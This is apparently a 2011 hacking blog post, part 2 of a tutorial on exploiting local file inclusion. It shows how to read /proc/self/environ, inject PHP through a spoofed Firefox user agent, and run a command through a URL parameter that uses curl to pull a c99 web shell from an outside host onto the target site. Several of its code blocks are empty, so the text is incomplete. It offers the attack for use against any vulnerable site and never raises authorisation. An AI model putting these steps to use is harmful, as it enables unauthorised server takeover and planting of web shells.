Thursday, September 8, 2011

Local File Inclusion Tutorial Part 2 of 4

Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================

So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs :D

Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?

Open a new tab in Mozilla,and type "about:config" (without quotes)...

Now,in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Code:
Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7
Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:
If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...

Instead of typing
Code:
as useragent,type this:
Code:
Then load your vuln page like this:
Code:
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php
So,lets review... basicaly,you are just adding &cmd= thing at the end of url...

Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:
Code:
http://yourvulnsite.com/c99.php
And that's all for now...cheers!

No comments:

Post a Comment

Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security